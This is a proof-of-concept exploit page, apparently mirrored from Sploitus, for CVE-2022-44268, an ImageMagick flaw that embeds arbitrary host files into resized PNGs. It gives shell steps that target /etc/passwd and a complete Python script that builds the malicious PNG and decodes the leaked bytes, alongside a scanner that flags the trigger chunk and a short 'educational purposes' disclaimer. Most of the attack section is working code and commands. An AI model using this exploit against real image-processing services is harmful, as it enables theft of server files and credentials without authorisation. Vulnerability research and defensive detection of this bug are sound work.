## https://sploitus.com/exploit?id=C2673E45-A367-5DA4-AA91-110C67238C3A
# CVE-2022-44268
This repository contains a Proof of Concept (POC) for a vulnerability in [ImageMagick](https://github.com/ImageMagick/ImageMagick) (v. 7.1.0-49), a widely used open-source image manipulation library. The vulnerability allows an attacker to embed the content of an arbitrary file into a resized image when ImageMagick parses a PNG file.
## Description
When ImageMagick performs an operation such as a resize on a crafted PNG, the output image can end up containing the content of an arbitrary file on the host, provided the process running ImageMagick has permission to read it. The root cause is the way ImageMagick handles textual chunks in PNG files.
A malicious actor can exploit this by crafting a PNG file, or taking an existing one, and adding a textual chunk (tEXt). Such a chunk consists of a keyword and a text string. If the keyword is exactly "profile" (without quotes), ImageMagick treats the text string as a filename, reads that file and attaches its content to the image as a raw profile. When the image is then written out, for example as the resized PNG a web application returns to the user, the profile, and with it the content of the file chosen by the attacker, is embedded in the output image's metadata, from where it can be read back.
For more information, see [this article from MetabaseQ](https://www.metabaseq.com/imagemagick-zero-days/).
## Proof of Concept
To exploit ImageMagick, generate a malicious PNG:
```shell
python3 CVE-2022-44268.py /etc/passwd # Create output.png
```
Then, run a resize operation with convert:
```shell
convert output.png -resize 50% leak.png
```
Finally, inspect the leaked image: `identify -verbose` prints the embedded raw profile as a byte count followed by a hex dump, which can be decoded back into the original file content:
```shell
identify -verbose leak.png
# ...
Raw profile type:
2367
726f6f743a783a303a303a726f6f743a2f726f6f743a2f6269 [...]
```
```python
python -c "print(bytes.fromhex('726f6f743a783a303a303a726f6f743a2f726f6f743a2f6269 [...]'))"
```
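The three steps above in one script, as an added example (this is not the repository's own `CVE-2022-44268.py`, and the sample `identify` output it parses is constructed, not a real capture). `build_png()` writes a minimal valid 1x1 PNG carrying a tEXt chunk `profile\0<path>`, which is the trigger described above; `find_profile_keys()` is the defender-side check, walking the chunk list of an untrusted PNG with CRC verification and reporting every text chunk whose keyword is `profile` so an upload pipeline can reject the file before it reaches ImageMagick; `decode_raw_profile()` turns the `Raw profile type` hex block from `identify -verbose` back into bytes and checks it against the printed byte count. The scanner goes slightly beyond the page's tEXt case and also looks at zTXt and iTXt chunks, whose keyword field has the same layout; that generalisation is an assumption of this example.

```python
#!/usr/bin/env python3
"""Added example for CVE-2022-44268; not the repository's CVE-2022-44268.py."""
import re
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Chunk types that carry a NUL-terminated keyword (assumption: all three are
# worth scanning, the page itself only discusses tEXt).
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}


def chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: length, type, data, CRC-32 over type + data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_png(target_path: str, keyword: bytes = b"profile") -> bytes:
    """Return a valid 1x1 RGB PNG with a tEXt chunk `keyword\\0target_path`."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, RGB
    idat = zlib.compress(b"\x00\xff\x00\x00")  # filter byte 0 + one red pixel
    text = keyword + b"\x00" + target_path.encode()
    return (PNG_SIGNATURE
            + chunk(b"IHDR", ihdr)
            + chunk(b"tEXt", text)
            + chunk(b"IDAT", idat)
            + chunk(b"IEND", b""))


def iter_chunks(png: bytes):
    """Yield (type, data) for each chunk, verifying the signature and CRCs."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        data = png[pos + 8:pos + 8 + length]
        crc_bytes = png[pos + 8 + length:pos + 12 + length]
        if len(data) != length or len(crc_bytes) != 4:
            raise ValueError(f"truncated {ctype!r} chunk at offset {pos}")
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != struct.unpack(">I", crc_bytes)[0]:
            raise ValueError(f"bad CRC on {ctype!r} chunk at offset {pos}")
        yield ctype, data
        pos += 12 + length
        if ctype == b"IEND":
            break


def find_profile_keys(png: bytes, keyword: bytes = b"profile") -> list:
    """Return (chunk type, remainder) for every text chunk whose keyword matches.

    Only the keyword (bytes before the first NUL) is compared. For tEXt the
    remainder is the literal text, i.e. the path the PoC wants read; for zTXt
    and iTXt it is the raw, still encoded remainder of the chunk.
    """
    hits = []
    for ctype, data in iter_chunks(png):
        if ctype in TEXT_CHUNKS:
            key, _, rest = data.partition(b"\x00")
            if key == keyword:
                hits.append((ctype.decode("ascii"), rest))
    return hits


_RAW_PROFILE = re.compile(
    r"Raw profile type[^\n]*\n\s*(\d+)[ \t]*\n((?:[ \t]*[0-9a-fA-F]+[ \t]*\n)+)")


def decode_raw_profile(identify_output: str) -> bytes:
    """Recover the leaked bytes from the `Raw profile type` block that
    `identify -verbose` prints: a byte count line followed by hex lines."""
    m = _RAW_PROFILE.search(identify_output)
    if m is None:
        raise ValueError("no Raw profile block found")
    count = int(m.group(1))
    data = bytes.fromhex(re.sub(r"\s+", "", m.group(2)))
    if len(data) != count:
        raise ValueError(f"profile announces {count} bytes, decoded {len(data)}")
    return data


# Constructed sample of what a leaked /etc/passwd line looks like in the
# identify output (hex wrapped over two lines, as ImageMagick does).
SAMPLE_LEAK = b"root:x:0:0:root:/root:/bin/bash\n"
_hex = SAMPLE_LEAK.hex()
SAMPLE_IDENTIFY_OUTPUT = (
    "  Properties:\n"
    "    Raw profile type:\n"
    f"{len(SAMPLE_LEAK)}\n"
    f"{_hex[:36]}\n{_hex[36:]}\n"
    "    date:create: 2023-01-01T00:00:00+00:00\n"
)

if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/passwd"
    with open("output.png", "wb") as fh:
        fh.write(build_png(path))  # then: convert output.png -resize 50% leak.png
    print(find_profile_keys(build_png(path)))
    print(decode_raw_profile(SAMPLE_IDENTIFY_OUTPUT))
```

Run with a path argument to produce `output.png` for the `convert` step; feed the real `identify -verbose leak.png` text to `decode_raw_profile()` to get the file back instead of hand-copying the hex. The CRC check in `iter_chunks()` matters for the defensive use: a scanner that silently skips malformed chunks can be desynchronised by an attacker and walk past the trigger chunk.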
> Note: This POC is intended for educational and informational purposes only. Please ensure that you have the necessary permissions and legal authorization before testing or using this POC on any system.